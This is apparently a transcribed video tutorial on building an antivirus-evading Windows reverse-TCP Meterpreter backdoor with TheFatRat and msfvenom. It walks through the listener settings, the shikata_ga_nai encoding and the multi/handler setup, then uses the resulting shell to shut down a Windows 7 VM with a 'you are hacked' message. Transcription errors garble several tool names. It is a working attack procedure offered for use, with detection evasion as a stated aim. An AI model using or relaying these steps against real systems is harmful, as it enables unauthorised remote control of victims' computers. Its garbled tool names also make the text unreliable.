In this tutorial, I'm about to create a MetaPredator exploit using FatRat from Lazy Script to hack Windows Operating System 7. Let me give you a small introduction about MetaPredator. MetaPredator is an advanced extensible payload that uses in-memory DLL injection stages and is extended over the network at runtime. MetaPredator initializes and establishes a TLS 1.0 link over the socket and sends a GET. Metasploit receives this GET and configures the client. So let me show you how we are going to do this. So first we are going to create a payload which is created using MSF Venom and with an encryption, and then we will create a listener in MSF console. First I am opening my terminal and I am typing L. The reason I am using Lazy Script in my tutorial is because it is very easy to use in VirtualBox, where we can save some hard disk space, and also this is absolutely an easy to use tool. Now I'm going to go to the tools 9 and I am going to select 2 remote access, and there I'm going to select 5 the FatRat. It says it can generate undetectable payloads. So it is initializing, so we have to wait for a second. So using this FatRat we can create a payload with MSF Venom, which comes with different types of encryptions, so it will be very hard to detect this payload by the Windows operating system. So here we are having a list of options, and we are going to select the first one, create backdoor with MSF Venom. I'm selecting 1, and in this list we are going to select 2, so that we are going to create a Windows and Windows payload. So we are going to select 2, and it is asking for the IP address. So the local host IP address, it denotes the IP address of our system. So I am going to check my own IP address system. Here it says 192.168.0.105, and I'm going to type this here, 192.168.0.105. The local port, we can set any port number. Here I'm going to give 444, and the output file names is Windows payload test. So here it is asking for the payload type. We are going to select Windows MetaPredator reverse_TCP. So it is in the option 3. Selecting option 3. Once you start this process, there will be some iterations in the encryption, and it will finally give an output which is completely encrypted with some sort of encryption provided by MSF Venom. So here it is using Shikata_GA. Okay, seems like our payload is completed, and it is in the folder root, the FatRat output Windows payload test.exe. Okay, let's minimize this and let's open another terminal. I'm going to go to Nautilus to open a folder /root/ the FatRat output folder. So here it is, our payload. I'm going to copy it and I'm going going to close this. I'm going to go to my network folder where I have already started my Windows 7 operating system in my virtual box. I'm going to paste this in the desktop folder of Windows. Pasting it, and I'm closing it. Now again I'm going to open a terminal. Now what we are going to do is we are going to create a listener which is going to receive the get. Hold on a second. For that, what we have to do is we have to type msf console. Sorry. It will take a second to start. Okay. Then what we are going to do is we are going to type use payload. Sorry. Use exploit slash multi slash handler. Once you open it, type set. So let me show you one more thing. We are going to check for the options. Show options. So we need to set the payload, the local host and local port. So I'm going to set it like set payload Windows slash meter preter slash reverse underscore TCP, and now I'm going to set the local host lhost. Already we have given the IP address 192.168.0.105. so this is the IP address that we are going to listen, and we are going to set the listener's port number L port as 444 as we have given already in the payload. Now I'm going to run the listener. So MSF console started listening, and now what I'm going to do is I'm going to open my Windows. I'm going to double click the payload that we have sent through our network folder, and we are going to see what happens. So it says that it has connected and it has established a connection between the Windows system and the terminal. So it is asking for the next commands to proceed, and we are going to check for the commands that are available. I'm typing help to see all the available commands. Now we can do certain things that we can do as we can do in the operating system Windows. I have not connected any webcam, and I'll be showing this later in the next coming tutorials. So what I'm going to now is I'm going to type shell, which is going to create a shell which is going to drop a system command shell. I have typed shell and I'm entering. Now we have got into the command prompt of the Windows, so we can do whatever we want here. Now I'm going to type shut down -S for shutdowning, and -T for timing, and -C for comment. You or hacked. Now I'm going to shut down the system by giving them a small message: you are hacked. Now we are going to see the output. So this is our Windows operating system, and this is our Kali Linux. I'm going to click enter. Here you can see this Windows operating system user is getting an error message saying that you are hacked, and the system is about to shut down within seconds. This is how we can create a Meterpreter Windows payload, and we can hack the system, and we can do much more using using the another options. Let me show you in the next upcoming videos. Thank you.